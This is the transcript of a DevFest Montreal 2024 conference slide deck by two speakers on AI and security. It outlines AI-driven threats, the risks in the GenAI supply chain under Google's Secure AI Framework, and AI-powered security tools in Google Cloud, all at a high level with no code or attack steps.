Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Al and Security: A double edge sword? by Stacy ...

Al and Security: A double edge sword? by Stacy Véronneau and Yan Bellerose

Imagine a world where your AI models are not just smart but also secure, and your security tools are supercharged with AI’s predictive power.

In this talk, we’ll dive into the two sides of the AI security coin:

Security in AI: We’ll explore how to protect your AI models in GCP from attacks, biases, and data breaches, ensuring they’re both robust and reliable.

Security with AI: Discover how GCP’s security tools leverage AI to detect threats, prevent attacks, and respond to incidents faster than ever before.

If you’re building or using AI in the cloud, this talk is your key to unlocking a future where AI innovation and security go hand-in-hand.

https://youtu.be/_phzlulmuy8
DevFest Montreal 2024

GDG Montreal

November 15, 2024
Tweet

More Decks by GDG Montreal

Other Decks in Programming

Transcript

  1. Stacy Véronneau Passionate Cloud Evangelist and Technical Lead, blending my

    strong business acumen with a deep dive into cloud technologies. My journey in tech is fueled by a love for learning and sharing knowledge, especially in the realms of cloud integration and operations. Whether you're a cloud newbie or a seasoned professional, I'm here to engage in thoughtful discussions, collaborate on exciting projects, and share insights from my journey.
  2. Yan Bellerose As a results-oriented technology enthusiast, I excel at

    bridging the gap between technical expertise, business objectives, and innovation. Known for delivering high-quality work and inspiring others, I possess a natural aptitude for adaptation and continuous learning. This enables me to quickly become effective in dynamic and fast-paced environments such as Google. As a technology passionate, I'm dedicated to staying at the forefront of emerging trends. My experience, ranging from customer engineering to security leadership roles, has equipped me with a deep understanding of the security industry.
  3. Montréal Our Topics For Today • AI 101 • AI

    as a Security Threat • Security in AI • AI in Security • The Google Ecosystem • Conclusion • Q&A
  4. AI is powerful but has both positive and negative implications

    (Double-Edged), especially in the security realm. But, let’s level set and frame this conversation and also take a few steps back. AI 101
  5. AI as a Security Threat: The dark side Potential risks

    and challenges posed by AI in security: • Adversarial attacks on AI systems • AI-powered cyberattacks • Deep Fakes and misinformation • Privacy and surveillance issues • Ethical considerations
  6. Vulnerabilities Galore: • Data Poisoning • Model Theft • Backdoors

    • Adversarial Attacks Security in AI: Protecting the Protectors
  7. The potential of AI, especially generative AI, is immense. As

    innovation moves forward, the industry needs security standards for building and deploying AI responsibly. That's why we introduced the Secure AI Framework (SAIF), a conceptual framework to secure AI systems. SAIF is designed to address top-of-mind concerns for security professionals, such as AI/ML model risk management, security and privacy—helping to ensure that when AI models are implemented, they're secure by default. Google's Secure AI Framework (SAIF)
  8. Train model Dataset Pretrained model(s) ML Framework Model hub Production

    model Inference in production Risks in stage of GenAI Supply Chain
  9. Train model Dataset Pretrained model(s) ML Framework Model hub Production

    model Inference in production Source tampering Inject vulnerability Data Poisoning Unauthorized Training Data Compromise model Model poisoning Bad model usage Insecure Integrated Component Risks in stage of GenAI Supply Chain Model Reverse Engineering Denial of ML Service Rogue actions
  10. Train model Dataset Pretrained model(s) ML Framework Model hub Production

    model Inference in production Risks in stage of GenAI Supply Chain Source tampering Inject vulnerability Unauthorized Training Data Compromise model Model poisoning Bad model usage Library vulnerability analysis Trusted source Sensitive Data protection Trusted source Trusted source Sensitive Data protection Network Isolation WAF & DDOS Protection Insecure Integrated Component Model Reverse Engineering Denial of ML Service Rogue actions Data Poisoning
  11. AI in Security: Enhancing Protection AI is being used to

    improve security measures like: • Threat detection and prevention • Vulnerability assessment • Incident response • Fraud detection • Cybersecurity automation
  12. AI Core Capability Why specialized LLM needed Example opportunities Summarize

    Classify Generate Complex & ever-growing security jargon not well-represented in other training sets. Help reduce the noise and increase the signal Corrupt, malicious, & vulnerable data/code not represented in other training sets Niche languages and data structures in security domain not well-represented in other training sets • Concisely explain behavior of suspicious scripts • Summarize relevant & actionable threat intelligence • SOC cases | Intel reports | Attack paths • Generate YARA-L detection • Generate SOAR playbook • Security Testing • Classify malware (Powershell, VBA, PHP, JavaScript) • Identify security vulnerabilities in code • Threat Relevance & Risk AI - key use case
  13. • AI Superpowers: AI-powered security for rapid threat detection and

    response. 󰭉 • Security Command Center: Panoramic security monitoring with AI. 🔭 • SecOps: AI threat detection that finds hidden attacks. 󰡸 • VirusTotal: AI-driven malware analysis and extermination. 🐛💥 The Google Cloud Ecosystem: AI and Security
  14. Google Claims World First As AI Finds 0-Day Security Vulnerability

    On November 1st 2024, An AI agent has discovered a previously unknown, zero-day, exploitable memory-safety vulnerability in widely used real-world software. It’s the first example, at least to be made public, of such a find, according to Google’s Project Zero and DeepMind, the forces behind Big Sleep, the large language model-assisted vulnerability agent that spotted the vulnerability.
  15. • Develop robust architecture and resilient AI models that are

    resistant to adversarial attacks. • Prioritize ethical considerations in the design and deployment of AI security systems. • Invest in research and development to stay inform and ready to react against emerging threats and vulnerabilities. • Foster collaboration between industry, academia, and government to ensure responsible and secure AI innovation in the security domain. To harness the benefits of AI while mitigating the risks, it's crucial to: